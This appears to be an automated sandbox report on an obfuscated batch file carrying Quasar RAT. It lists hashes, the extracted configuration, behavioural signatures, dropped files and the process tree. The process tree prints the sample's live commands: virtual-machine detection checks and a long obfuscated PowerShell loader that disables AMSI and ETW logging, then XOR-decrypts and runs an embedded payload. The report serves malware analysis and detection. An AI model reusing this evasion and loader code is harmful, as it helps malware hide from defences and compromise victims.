quasar | fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db

Analysis

max time kernel
148s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-12-2024 23:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

R8GHS_Client-built.exe_obf.bat
Size

4.8MB
MD5

0ea9a510475daf6eb6499a876dade6c2
SHA1

6b2414fc97ff2aa43a561d3110ec3e5017ca87ec
SHA256

fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db
SHA512

b94b96765df14ee5ca7617f98b2e5750ad361193f435c7d9e0a6c9f7a775cfd70c7960c522a055d69125652ce070c2281e29ccd120b00d5748c5aa4587ea494a
SSDEEP

49152:6xA1np9ExTwHISa8/DNhtJJMJYz4xkFjyfgxLHRvs24CJMBDU78RH:k

Score

10^/10

quasar fr execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

127.0.0.1:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes

encryption_key
A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1928-96-0x0000020EF8C70000-0x0000020EF8F94000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
1928	powershell.exe
2240	powershell.exe
1752	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
1012	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2420	powershell.exe
2420	powershell.exe
2240	powershell.exe
2240	powershell.exe
1752	powershell.exe
1752	powershell.exe
1928	powershell.exe
1928	powershell.exe
1928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: 36	872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: 36	872	WMIC.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1652	WMIC.exe
Token: SeSecurityPrivilege	1652	WMIC.exe
Token: SeTakeOwnershipPrivilege	1652	WMIC.exe
Token: SeLoadDriverPrivilege	1652	WMIC.exe
Token: SeSystemProfilePrivilege	1652	WMIC.exe
Token: SeSystemtimePrivilege	1652	WMIC.exe
Token: SeProfSingleProcessPrivilege	1652	WMIC.exe
Token: SeIncBasePriorityPrivilege	1652	WMIC.exe
Token: SeCreatePagefilePrivilege	1652	WMIC.exe
Token: SeBackupPrivilege	1652	WMIC.exe
Token: SeRestorePrivilege	1652	WMIC.exe
Token: SeShutdownPrivilege	1652	WMIC.exe
Token: SeDebugPrivilege	1652	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1652	WMIC.exe
Token: SeRemoteShutdownPrivilege	1652	WMIC.exe
Token: SeUndockPrivilege	1652	WMIC.exe
Token: SeManageVolumePrivilege	1652	WMIC.exe
Token: 33	1652	WMIC.exe
Token: 34	1652	WMIC.exe
Token: 35	1652	WMIC.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exepowershell.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 68 wrote to memory of 2420	68	cmd.exe	86
PID 68 wrote to memory of 2420	68	cmd.exe	86
PID 2420 wrote to memory of 872	2420	powershell.exe	87
PID 2420 wrote to memory of 872	2420	powershell.exe	87
PID 68 wrote to memory of 2240	68	cmd.exe	89
PID 68 wrote to memory of 2240	68	cmd.exe	89
PID 68 wrote to memory of 1596	68	cmd.exe	90
PID 68 wrote to memory of 1596	68	cmd.exe	90
PID 1596 wrote to memory of 1652	1596	cmd.exe	91
PID 1596 wrote to memory of 1652	1596	cmd.exe	91
PID 68 wrote to memory of 4828	68	cmd.exe	92
PID 68 wrote to memory of 4828	68	cmd.exe	92
PID 4828 wrote to memory of 5116	4828	cmd.exe	93
PID 4828 wrote to memory of 5116	4828	cmd.exe	93
PID 68 wrote to memory of 1752	68	cmd.exe	94
PID 68 wrote to memory of 1752	68	cmd.exe	94
PID 68 wrote to memory of 2300	68	cmd.exe	95
PID 68 wrote to memory of 2300	68	cmd.exe	95
PID 2300 wrote to memory of 1056	2300	cmd.exe	96
PID 2300 wrote to memory of 1056	2300	cmd.exe	96
PID 68 wrote to memory of 4960	68	cmd.exe	97
PID 68 wrote to memory of 4960	68	cmd.exe	97
PID 68 wrote to memory of 1012	68	cmd.exe	98
PID 68 wrote to memory of 1012	68	cmd.exe	98
PID 68 wrote to memory of 2916	68	cmd.exe	99
PID 68 wrote to memory of 2916	68	cmd.exe	99
PID 68 wrote to memory of 3668	68	cmd.exe	100
PID 68 wrote to memory of 3668	68	cmd.exe	100
PID 3668 wrote to memory of 3336	3668	net.exe	101
PID 3668 wrote to memory of 3336	3668	net.exe	101
PID 68 wrote to memory of 1928	68	cmd.exe	102
PID 68 wrote to memory of 1928	68	cmd.exe	102
PID 1928 wrote to memory of 2212	1928	powershell.exe	103
PID 1928 wrote to memory of 2212	1928	powershell.exe	103
PID 2212 wrote to memory of 3176	2212	csc.exe	104
PID 2212 wrote to memory of 3176	2212	csc.exe	104
PID 1928 wrote to memory of 4972	1928	powershell.exe	105
PID 1928 wrote to memory of 4972	1928	powershell.exe	105
PID 4972 wrote to memory of 4028	4972	csc.exe	106
PID 4972 wrote to memory of 4028	4972	csc.exe	106
PID 1928 wrote to memory of 892	1928	powershell.exe	108
PID 1928 wrote to memory of 892	1928	powershell.exe	108
PID 892 wrote to memory of 4460	892	csc.exe	109
PID 892 wrote to memory of 4460	892	csc.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:68
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:5116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:1056
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4960
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:1012
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:2916
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, 0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));[ReFLeCtION.asSEmBlY]::LoAdWitHpArTIAlName(([SYsTEm.TEXT.eNcoDINg]::UTf8.geTstRINg((83, 121, 115, 116, 101, 109, 46, 67, 111, 114, 101)))).GetTYPE(([systEm.TeXT.EnCoDINg]::UtF8.GEtstRINg((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 69, 118)) + [SySTEm.tEXT.encodiNG]::UTF8.GETsTrIng((101, 110, 0x74, 0x69, 110, 0x67, 46, 69, 0x76, 101, 0x6e, 0x74, 0x50, 0x72, 111, 0x76, 105, 0x64, 0x65, 114)))).getfIeLd(([SYsTEm.text.eNCOdiNG]::uTF8.getstrINg((0x6d, 0x5f, 0x65, 0x6e)) + [sySTeM.Text.EncODiNg]::UtF8.GEtSTrInG((97, 98, 108)) + [syStem.TeXt.EncOdIng]::uTF8.GeTsTRing((0x65, 0x64))),([sySTem.Text.eNcodINg]::UtF8.GeTstRing([SYstEM.CoNveRT]::FROmBasE64STriNG('Tm9uUHVibGljLEluc3RhbmNl')))).seTValUE([REF].asseMBLy.GetTyPe(([sYStem.text.encOdINg]::UTf8.geTSTRiNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99)) + [SySTeM.texT.eNCoDING]::utF8.GeTStRINg((0x69, 110, 0x67, 46, 0x50, 83, 69, 0x74, 119, 76, 111, 103, 80, 0x72, 0x6f, 118, 0x69, 0x64, 0x65, 0x72)))).GEtfIeLD(([SYStEM.tExT.EncOdING]::uTf8.geTStRiNg((101, 0x74, 0x77, 80, 0x72, 111, 0x76, 105, 0x64, 0x65, 0x72))),([SystEm.teXT.EncOdinG]::Utf8.geTsTrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))).getVAluE($null),0);${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | .([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SYSTem.CoNVerT]::fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, 98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));${kdotcabiZvWzUe}=.([char](((489 -Band 330) + (489 -Bor 330) + 1171 - 1912))+[char](((5256 -Band 2125) + (5256 -Bor 2125) - 4663 - 2617))+[char]((436 - 1047 + 5610 - 4880))+[char](((6007 -Band 1143) + (6007 -Bor 1143) - 3369 - 3736))+[char](((6570 -Band 5861) + (6570 -Bor 5861) - 8832 - 3520))+[char](((-5856 -Band 5287) + (-5856 -Bor 5287) - 5737 + 6404))+[char]((190 - 4849 - 2788 + 7553))+[char]((15595 - 5946 - 3629 - 5919))+[char]((-4101 - 7031 + 6016 + 5215))+[char](((-7556 -Band 3381) + (-7556 -Bor 3381) + 9926 - 5635))) byte[] ${`Kd`Ottb`AIdX`WfeP}.lenGtH;for (${kdOtdGvp`BeC`Mnr}=0; ${kdOt`DGV`Pbe`Cmnr} -lt ${`KDottbAi`DXWfe`P}.lengTH; ${K`DotdG`VpbeCmnr}++) {${kDot`Ca`B`IZvWzue}[${`K`Dot`D`G`VPBeCmnr}]=${kdOttbaidxwfeP}[${kd`OtD`Gvpbe`Cmnr}] -bxor ${kdotDguKzLrZen}[${kd`OtdG`VpbeC`Mnr} % ${Kdotd`GuKzLr`Zen}.leNGTh]};.([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dbuiiuyy\dbuiiuyy.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A6.tmp" "c:\Users\Admin\AppData\Local\Temp\dbuiiuyy\CSCBF34853D5B524198B730538B2167CDC5.TMP"
      4⤵
      PID:3176
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ksq4vpvz\ksq4vpvz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp" "c:\Users\Admin\AppData\Local\Temp\ksq4vpvz\CSC66C3107E3AA4D789877B934AC32DC9.TMP"
      4⤵
      PID:4028
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2ggi04b\u2ggi04b.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACCA.tmp" "c:\Users\Admin\AppData\Local\Temp\u2ggi04b\CSC65E0E327B56543E9B6108584C9EE1A68.TMP"
      4⤵
      PID:4460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA5A6.tmp

Filesize
1KB

MD5
9cc2ee370d80599ead74b39e4e382586

SHA1
663cb18479215116912a4b699dff16d186e0662a

SHA256
06be1f70d995e0206fcfcabfa7b07def662115146e99cd826aa7c975b0875422

SHA512
aaf0667b0e34ba8bfdb73a1a31abfbf16ed45b36d5aca38844eb6ea2c7669e5c538b28bff8fafcc6326e6509e0d78c70ba8a66b301d3a293f2c41bb167313aa3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp

Filesize
1KB

MD5
827bf07d848e375362c9f1f115a3e083

SHA1
318e9399fb72bb069a837c871e4a8df9f6f2894b

SHA256
144386e4748bc2e1bb223dad836fab5bff3634e74892a2b34848d94cb0b00db4

SHA512
20430391046e22f831f426739e2ce08dadd86f94eb4ad9f11ea671931aa8ecda7d0629c68118fb3dd27672880510e18d8d6faafe25e8a68130402628760bf9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESACCA.tmp

Filesize
1KB

MD5
78ad8c1fb98c0bf2de7e51062b8c30fe

SHA1
1510c5b8f739dada32544f00566b460b9e6b648a

SHA256
3c59e32618e7acd3d70a9a86dc6e9d1940fcca044693793d33637d7b75e3bd06

SHA512
ec6ece7cb81292f365280d2c9f2b94a08d733667cf2ed59c4b08dd361316f074f28d1c8ce265a34fc7204c2586240723ac1a8b66477d25130806af371cf57ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moxkxjyb.wwf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dbuiiuyy\dbuiiuyy.dll

Filesize
3KB

MD5
a2a5c4e7df6b9e816361315980ed673c

SHA1
68eeaf36339e19fa201033dff714ac4dcffae58a

SHA256
8474a66d4f8c7605f4a107163c852d2049477ca582eb2d0df43b4c76233ba169

SHA512
4cd1783d4ae26e053abc768433a2246d37a4fb6fbf1e1c46c3f047a3110175d58224a9fe36ad66d9b814396331c58330d2e9e64ce1721662bbe1035bb0e0777f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ksq4vpvz\ksq4vpvz.dll

Filesize
7KB

MD5
0a43651f6842ef940608410d87fe02c9

SHA1
6a647daf3e6a783d298245050747a6a8382b34b5

SHA256
26950e06fe3834e20c8d069191048f1c9acbcdb81920e4f4e42d51221b4ab391

SHA512
ba5c390c0c0396714ddb4be7afc0c5629119f6a65ab86476c82792f7eddf6ced2bafa6e8a6e296a2d8b9ddd4ea2bf57d1642ffb5cc850afd04bb1d62c31490c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\u2ggi04b\u2ggi04b.dll

Filesize
4KB

MD5
82da036fdea200647f4db6ffad26d853

SHA1
f3d8c9669a92eccc1d25571f760b9f4cb45c8518

SHA256
1085e669b20786831c147bcd75f753fd35973b4181daab89aba27a02dae36946

SHA512
ffcc415acff7b5b10b65a82b9023ce82280cb72f462d525c2777a5d516bddbe5b5533cb5948ef0755a31177766e47ecccb6bb9cf267234bcc9743cf1c6549827

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbuiiuyy\CSCBF34853D5B524198B730538B2167CDC5.TMP

Filesize
652B

MD5
f0c9c221132a307ef64432bc22623706

SHA1
deb5d657111f18b7c79104319f05bf4ecd725023

SHA256
cf1b2c5e66c7dbbaa84b2435e6ed0116c763b881a580bb0598b971453a284084

SHA512
5b5faf018869edd6b5290ae2281b82e5e756f50d867b383fb479e878bc8f6d1ec770c39a2485cda188e5ae983455b42bf72078c3d47cfa08601a73ad4b54b1b5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbuiiuyy\dbuiiuyy.0.cs

Filesize
296B

MD5
59e00d9a8925d2e96361aa508ec6f847

SHA1
787a9ed5d1e3b60b051580b95f48ddaddbb12df5

SHA256
3e745a1684973fcd0d62fb9f937cb7748df158ff608c8a5c3da39a8b1f30b540

SHA512
5d9e2cf08f0f56a9c1ce0d966e88fbb27b9fee06da16c38b723c5a5786fb35b725bb015cbaedb860e3fb68b7760b4afe072396803244466adc0707dcc991078f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbuiiuyy\dbuiiuyy.cmdline

Filesize
369B

MD5
b140f59ac0f07e31e8b61296017c2e9c

SHA1
b3ab1304992bd4c33a0578028275c7b664226bdf

SHA256
ff47c8be24edac901005199975f7b0b6ec349e65834b33212950e0dbfd5cb62e

SHA512
5a664d71ebd988728fe7e9d72e3c6e7b2342cd8592eff12651379510d2ed4b2e091bd5f64db05cc78cb2c8676acdeff3f7dfc688c6b0d3970e5d58d6e2dc4412

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ksq4vpvz\CSC66C3107E3AA4D789877B934AC32DC9.TMP

Filesize
652B

MD5
53ec00defb7804e276e6f2fade41453b

SHA1
e723fd1f46a2ea6be388aa91af948a4d074fe8b6

SHA256
7a8ac4667b9590cc44dcdb3ca210526f6ea39df864ee142f1ebe0230fcaf0068

SHA512
9487f771951f73eea424bd642504b61d6e8a97bd7c62dee1573492ef435fff72b4f9f9d752726f47a654ec88522f2ba32c7f406b18ae8505eff9dc196ac1e35c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ksq4vpvz\ksq4vpvz.0.cs

Filesize
9KB

MD5
5fe5dff46b565d67601ae7d3420c5898

SHA1
bfbc553fcc84f1bc667f49f27207b26e2b47b3b4

SHA256
4e6e2f7132e6d41f4d8d8639eb9beb4e89fd683632f2e12f74f35fa82d682305

SHA512
f9b0ecad474ec77d88e1f27196e3e0a6f65d38999b50f5c6ba34fc41dcddcffb46ca93fcf9e32aa556352c091fabd0b2722819980b8ab22df2349ee9a8f9c7f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ksq4vpvz\ksq4vpvz.cmdline

Filesize
369B

MD5
ca3fbcbffb5f8bdf4f3e7a91db223c4c

SHA1
c39367b8528e18d4147c02c88211a36aec1714c2

SHA256
cb028bed7b83fce8a98fd62349e162e5f39f3c871169254402f8a2f9380e564e

SHA512
157c0ca79e38094b2ae029ba9fd26036ca11ae2c3bb5d74367829eb2b51e88cd8be8416d62a2b91e296f3f6febda2bf2d4c40c04325d28fce63148284fda7fee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u2ggi04b\CSC65E0E327B56543E9B6108584C9EE1A68.TMP

Filesize
652B

MD5
7361227aef321c220a8ec30f066ef2ce

SHA1
9b90c0e17d860dbdc12c75ad37dbc938da30062d

SHA256
25bada13f9a16dccdf00a15d34dcd0c7c0428e98c3022d9b1777fcbcd6830af3

SHA512
3406cf563d8b4563d59e8ea56079bb5ed7e9cc739a13c7939d94f42e87aaf0de1171f78e7fa6d58f3ae3cc6f4046fe15d04088cc36ebc0862856d25bc32dbc82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u2ggi04b\u2ggi04b.0.cs

Filesize
1KB

MD5
6e8030c75c39f3dab7309a0eaac2ba0a

SHA1
270afbaadbca8c757511a0730a20a19f4f76a6b9

SHA256
538802dd9cf317ab687c4d40d6e1f9ca4b62f3debb6d58b67b88a17f02f2c3cb

SHA512
